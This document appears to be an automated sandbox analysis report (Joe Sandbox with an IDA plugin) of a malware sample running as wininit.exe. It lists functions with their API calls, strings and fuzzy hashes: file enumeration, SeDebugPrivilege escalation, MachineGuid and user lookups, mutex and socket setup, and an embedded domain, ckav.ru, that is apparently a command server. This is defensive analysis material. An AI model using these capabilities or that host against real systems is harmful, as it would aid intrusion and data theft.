Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: Y>0
API String ID: 0-1250427286
Opcode ID: 975f12cd19c3882374c9719e153f546ff0cb4fe55b11ca2c16d1aca323d04cee
Instruction ID: 159e01e36f13ea26bd11b6cccc05466d4026927050965abc8a159b9dbe696a59
Opcode Fuzzy Hash: 975f12cd19c3882374c9719e153f546ff0cb4fe55b11ca2c16d1aca323d04cee
Instruction Fuzzy Hash: 25E11774E102598FDB14DFA9C5809ADFBB2BF89301F24C169D819AB356C734A941CFA1

Function 0037D6D8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

z|>, xrefs: 0037D733

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: z|>
API String ID: 0-1134487427
Opcode ID: e3397d571ae3d86fa5cf6ffef425206677995e613d450ffbbc70c3c3708a4497
Instruction ID: 928b4e376d7dfacc22c10b74cd908c5ccee67488caf5c059950e90882f2bd196
Opcode Fuzzy Hash: e3397d571ae3d86fa5cf6ffef425206677995e613d450ffbbc70c3c3708a4497
Instruction Fuzzy Hash: 7BE11974E001598FDB14DFA9C580AADFBB2BF89304F24C169D819AB356D734AD41CF61

Function 0037C848 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

fo_N, xrefs: 0037C8A3

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID: fo_N
API String ID: 0-3502626514
Opcode ID: 33213508f42c47e76d16542f05ba23d0e407f4c3bdad6eca6b62640643e175eb
Instruction ID: 22c258ce9cb38265777bfbf77e5d00895c873bd9d905983a44862bd2be534cd6
Opcode Fuzzy Hash: 33213508f42c47e76d16542f05ba23d0e407f4c3bdad6eca6b62640643e175eb
Instruction Fuzzy Hash: DBE11774E102598FDB14DFA8C5809AEFBB2BF89301F24C169D919AB356D734AD41CFA0

Function 0037CC80 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d5046ad3875c38f1fd7ebeb84fde3623ef895bdd5c583dbb20c6e9256fac58
Instruction ID: 6827fd8bb7bf0502c3b47fac431e3e8db720fe456db421b9c3ffad14f280e863
Opcode Fuzzy Hash: 06d5046ad3875c38f1fd7ebeb84fde3623ef895bdd5c583dbb20c6e9256fac58
Instruction Fuzzy Hash: 4EE10874E101598FDB24DFA8C5809ADFBB2BF89301F24C169D819AB356C735AD41CFA0

Function 0037BFD8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.420528950.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_370000_wininit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08ff15a6e312a19f72b9d3c7cf67997ddc5167e5959b10aed5bbacba4671ed0
Instruction ID: 6e800640b14ed361557f80feb9016e95a7b2f1cebf7924bef2478798a927f1bb
Opcode Fuzzy Hash: b08ff15a6e312a19f72b9d3c7cf67997ddc5167e5959b10aed5bbacba4671ed0
Instruction Fuzzy Hash: A2E10674E10259CFDB14DFA9C5809AEBBB2BF89301F24C169D819AB356C734AD41CFA0

Analysis Process: wininit.exePID: 772, Parent PID: 2092COMMON

Execution Graph

Execution Coverage:	33.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.4%
Total number of Nodes:	1845
Total number of Limit Nodes:	99

Executed Functions

Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58

Strings

%s\*, xrefs: 00403D99
%s\%s, xrefs: 00403E3A, 00403EAF, 00403F1C
Windows, xrefs: 00403DEA
Program Files, xrefs: 00403E01

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNext
String ID: %s\%s$%s\*$Program Files$Windows
API String ID: 1690352074-2009209621
Opcode ID: ce1aa3e376eaa67b233d40deefcf11ef12cbb06c2f81313b05abad007ffde034
Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
Opcode Fuzzy Hash: ce1aa3e376eaa67b233d40deefcf11ef12cbb06c2f81313b05abad007ffde034
Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C

Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589

Strings

SeDebugPrivilege, xrefs: 00406548

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID: SeDebugPrivilege
API String ID: 3615134276-2896544425
Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674

Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559

Function 004061C3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
_wmemset.LIBCMT ref: 00406261
GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0

Strings

IDA, xrefs: 004061E5, 00406276, 004062AC, 0040621D, 004061E8, 00406220, 0040628B
IDA, xrefs: 00406304

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: _wmemset$AccountErrorInformationLastLookupToken
String ID: IDA$IDA
API String ID: 3235442692-2020647798
Opcode ID: 1c08e37961a647aa104d4009945586a48361f9d4dbdfa32f9cccef29c78ec135
Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
Opcode Fuzzy Hash: 1c08e37961a647aa104d4009945586a48361f9d4dbdfa32f9cccef29c78ec135
Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
socket.WS2_32(?,?,?), ref: 00404E7A
freeaddrinfo.WS2_32(00000000), ref: 00404E90

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: freeaddrinfogetaddrinfosocket
String ID:
API String ID: 2479546573-0
Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A

Strings

.tmp, xrefs: 00404196

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: File$AllocCreateReadVirtual
String ID: .tmp
API String ID: 3585551309-2986845003
Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: File$CreatePointerWrite
String ID:
API String ID: 3672724799-0
Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8

Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53

Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F

Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0

Strings

ckav.ru, xrefs: 00412D96

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$CreateFreeProcessThread_wmemset
String ID: ckav.ru
API String ID: 2915393847-2696028687
Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED

Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

_wmemset.LIBCMT ref: 0040634F

Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082

Strings

CA, xrefs: 00406354, 0040635A

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$AllocateNameProcessUser_wmemset
String ID: CA
API String ID: 2078537776-1052703068
Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD

Function 0041284A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

SHRegSetPathW.SHLWAPI(00000000,?,00000000,-80000001,00412D05,00000002,EBB783D2,00000000,00000000,5,A,00412D05,-80000001,00000000,5,A,00000000,00000000), ref: 0041286C

Strings

5,A, xrefs: 0041284A

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Path
String ID: 5,A
API String ID: 2875597873-3842761921
Opcode ID: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction ID: e513a9aa1dc03f827004651369457c754081445531a40a51076ab4492d9af12d
Opcode Fuzzy Hash: 985f833e562fc410bf8876cb62ef75c9432edfe987e4e1d4c2e5d722ffee7efc
Instruction Fuzzy Hash: 48D0C93214020DBBDF026EC1DC02F9A3F2AAB48754F004014BB18280A1D6B3A630ABA9

Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8

Strings

IDA, xrefs: 00406086

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID: IDA
API String ID: 4114910276-365204570
Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95

Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B

Strings

s1@, xrefs: 00402C15

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID: s1@
API String ID: 190572456-427247929
Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNEL32(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$AllocateOpenProcessQueryValue
String ID:
API String ID: 1425999871-0
Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: CheckMembershipToken
String ID:
API String ID: 1351025785-0
Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764

Function 00404BEE Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHQueryValueExW.SHLWAPI(?,?,00000000,00000000,00000000,00000208,00000002,C170F4F3,00000000,00000000), ref: 00404C35

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcessQueryValue
String ID:
API String ID: 3318767951-0
Opcode ID: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction ID: 79155844af0806bdf0c3860b022b506ec09407af8f096f74cdf457618d2260c4
Opcode Fuzzy Hash: d2beadab3bee545cf5c60f8980fe712c5f4b0e5d6cba08d7b965a56316f6b4bd
Instruction Fuzzy Hash: 16F0247290611436E7206E578E0DCAF7F3CCBC3B25B01003EF908B61C0DAB99A0181B8

Function 00404056 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000,0000000A,C7F71852,00000000,00000000,00413CAD,0000001A,00000001), ref: 0040408F

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFolderPathProcess
String ID:
API String ID: 398210565-0
Opcode ID: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction ID: 7d0b33caadbb1370849e9dfd1ecad86b360ac2e9a1dca59c17201c727c4e1007
Opcode Fuzzy Hash: 5a4567249377e1c5aacc7f09cc20ffc60836f4584ead4ee4f677cdbbf549426b
Instruction Fuzzy Hash: 57E06D6260156136D23129A7AC09D6B6E7DCBD3FA5B00003FF708F52C1D96D990281BA

Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4

Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5

Function 004044A7 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB

Memory Dump Source

Source File: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_wininit.jbxd

Yara matches

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
